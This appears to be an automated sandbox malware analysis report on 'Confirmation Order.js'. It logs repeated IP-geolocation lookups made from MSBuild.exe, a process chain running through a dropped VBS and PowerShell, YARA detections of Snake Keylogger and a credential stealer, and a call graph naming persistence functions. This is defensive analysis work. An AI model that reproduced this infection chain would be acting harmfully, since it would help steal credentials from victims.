                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nCCxrgUs1ORFJv%2F1R1%2BlJEVhodAXsx1qWUYHOUv46PFIINV4BkPf7kMtntoSbSHSDHZkxAfQGmeSOHp49mSjtV5MWSQttS9z%2FYbDGDO9d0%2Fo8TxhmcXU%2FT4QbGX69urS7oz0C6q2"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a8a9554c93a0ca6-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-25 07:54:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-07-25 07:54:40 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.1164401188.114.97.34437880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          2024-07-25 07:54:41 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-07-25 07:54:41 UTC708INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:41 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 22804
                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xAOsfAzigFg4TRPNu%2BkT10T4AZTiuTsl68ZBCCCeksSi7ijGA0ckSLuXAsj3TrpUE8J%2FOb%2BZCgeDnlsZblUbZ5qjypWYw2rKPVbaAreXZe2%2FmVPHSCOsx560qnBeJnfBzrVGrNQX"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a8a955a1d116a55-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-25 07:54:41 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-07-25 07:54:41 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.1164405188.114.97.34437880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          2024-07-25 07:54:42 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-07-25 07:54:43 UTC706INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:42 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 22805
                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKWrq3tnkW7SeqRZORclE0fdlYqfgsk6%2FxhvllkHfiXkKX5sAKvtJtoPkl26ImFeA9z7a9rgSKXiR%2FEfvbQKktJDq5nxvdaUhHMDDePfbrK3RdQjhKizsC8cFoZzbJAu2Dg%2FVs5w"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a8a9562aa557d16-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-25 07:54:43 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-07-25 07:54:43 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.1164407188.114.97.34437880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          2024-07-25 07:54:44 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-07-25 07:54:44 UTC708INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:44 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 22807
                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MNM1cXUuZEYDv2bgJOv%2FLbliFQcH7%2FZg3WQVVhGYuUiO1qEexLP6T7HTnV5e9e1EF4qLMTEGnTPilLWWuTj7t2DRartDCp1MVpsgjXX9ajhfUKJlFo9e2ShyEP%2FtKRC2J2P8%2FzmW"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a8a956b490c0cd9-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-25 07:54:44 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-07-25 07:54:44 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.1164410188.114.97.34437880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          2024-07-25 07:54:45 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-07-25 07:54:45 UTC708INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:45 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 22808
                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zJLkUTI2C1LsBLbaxMyJxBTk%2BOtuUgv2wVywpNqrnUQtpoUaz1CL1u2GHzGA2a7Je904A1oP%2F%2BWro%2BburweMTz4q5mEYu7PIligPoOafJjW4pRZGdC4W2N8lo5qqTe6GxSv6L1TK"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a8a9573cb997cea-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-25 07:54:45 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-07-25 07:54:45 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.1164413188.114.97.34437880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          2024-07-25 07:54:47 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-07-25 07:54:47 UTC708INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:47 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 22810
                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cXD7JfPT2iER0%2B04WsJsrvOh4SHfYFCVLSmga9mupPCU53SzucbBP3XEXA7pQ8ecp5NX3z1j%2FjugEnH2OyXY56dZdVrNHId9vgAQpdecwipeDgLZkTNgnA%2FXBr0zMH9Ry4GvHAn%2B"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a8a957c8f784325-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-25 07:54:47 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-07-25 07:54:47 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.1164416188.114.97.34437880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          2024-07-25 07:54:48 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-07-25 07:54:48 UTC704INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:48 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 22811
                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7DrICnYe2wfIctrSp9g0mUNr7Ayyj1PFd9%2BzNPsGjqwnj4xj0mdSFNGh3N1IWUO5oZUO8YU3Qqtfd6qZeFEOTng4Yr9oKUqBv0etcbVVQtTjPIb2SNHvKdp%2FPsRi0KCu90eyyrXt"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a8a958558430f98-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-25 07:54:48 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-07-25 07:54:48 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.1164420188.114.97.34437880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          2024-07-25 07:54:49 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-07-25 07:54:49 UTC710INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:49 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 22812
                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tJ8gy1%2BQO2lrzAacBoJlEKbqakpWTkXXUEesF%2FG50fNLfGvllT1gMrBnBYjwFPj2zAc3yoTv5T1hqM6pPh6TYT1rH%2FQ1e07YkI4Ppf05%2BLqCT1be3if96XIS%2BgJM6KkXKJQZAbf9"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a8a958df8c243f9-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-25 07:54:49 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-07-25 07:54:49 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:03:54:10
                          Start date:25/07/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Confirmation Order.js"
                          Imagebase:0x7ff771250000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:03:54:13
                          Start date:25/07/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff6220e0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:03:54:32
                          Start date:25/07/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\YLhjFraZZwiadZg.vbs"
                          Imagebase:0x7ff771250000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:12
                          Start time:03:54:32
                          Start date:25/07/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6eb350000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:13
                          Start time:03:54:32
                          Start date:25/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff68cce0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:14
                          Start time:03:54:37
                          Start date:25/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0x7c0000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2565090170.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2565090170.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:false

                          Target ID:16
                          Start time:03:54:38
                          Start date:25/07/2024
                          Path:C:\Windows\System32\wermgr.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7688" "2844" "2376" "2388" "0" "0" "2436" "0" "0" "0" "0" "0"
                          Imagebase:0x7ff7b50a0000
                          File size:229'728 bytes
                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Call Graph

                          • Executed
                          • Not Executed
                          callgraph clusterC0 clusterC2C0 clusterC20C2 clusterC44C2 clusterC4C0 clusterC6C0 clusterC24C6 clusterC8C0 clusterC10C8 clusterC12C8 clusterC14C8 clusterC16C0 clusterC18C16 clusterC22C0 clusterC26C0 clusterC28C26 clusterC30C28 clusterC32C28 clusterC34C28 clusterC36C26 clusterC38C26 clusterC40C26 clusterC42C0 clusterC46C0 clusterC48C46 clusterC50C48 clusterC52C48 clusterC54C48 clusterC56C46 clusterC58C46 clusterC60C0 clusterC62C60 clusterC64C60 clusterC66C0 clusterC68C66 clusterC70C66 clusterC72C66 clusterC74C0 clusterC76C74 clusterC78C76 clusterC80C76 clusterC82C0 clusterC84C82 clusterC86C82 clusterC88C82 E1C0 entry:C0 F9C8 hexToAscii E1C0->F9C8 F27C26 createTaskScheduler E1C0->F27C26 F43C42 initializeVariablesAndProcess E1C0->F43C42 F47C46 createTextFile E1C0->F47C46 F61C60 replaceString E1C0->F61C60 F3C2 ActiveXObject("WScript.Shell") F21C20 RegWrite F45C44 ExpandEnvironmentStrings F5C4 ActiveXObject("Scripting.FileSystemObject") F7C6 ActiveXObject("WScript.Shell") F25C24 RegRead F11C10 fromCharCode F9C8->F11C10 F13C12 parseInt F9C8->F13C12 F15C14 substr F9C8->F15C14 F17C16 splitAndSaveToRegistry F17C16->F21C20 F17C16->F9C8 F19C18 substr F17C16->F19C18 F23C22 isDotNetFramework4Installed F23C22->F25C24 F27C26->F9C8 F31C30 Connect F27C26->F31C30 F33C32 GetFolder F27C26->F33C32 F35C34 NewTask F27C26->F35C34 F37C36 Create F27C26->F37C36 F39C38 Create F27C26->F39C38 F41C40 RegisterTaskDefinition F27C26->F41C40 F29C28 ActiveXObject() F43C42->F45C44 F43C42->F9C8 F43C42->F17C16 F43C42->F23C22 F43C42->F61C60 F67C66 writeToRegistry F43C42->F67C66 F75C74 fetchStringFromURL F43C42->F75C74 F83C82 reverseString F43C42->F83C82 F51C50 FileExists 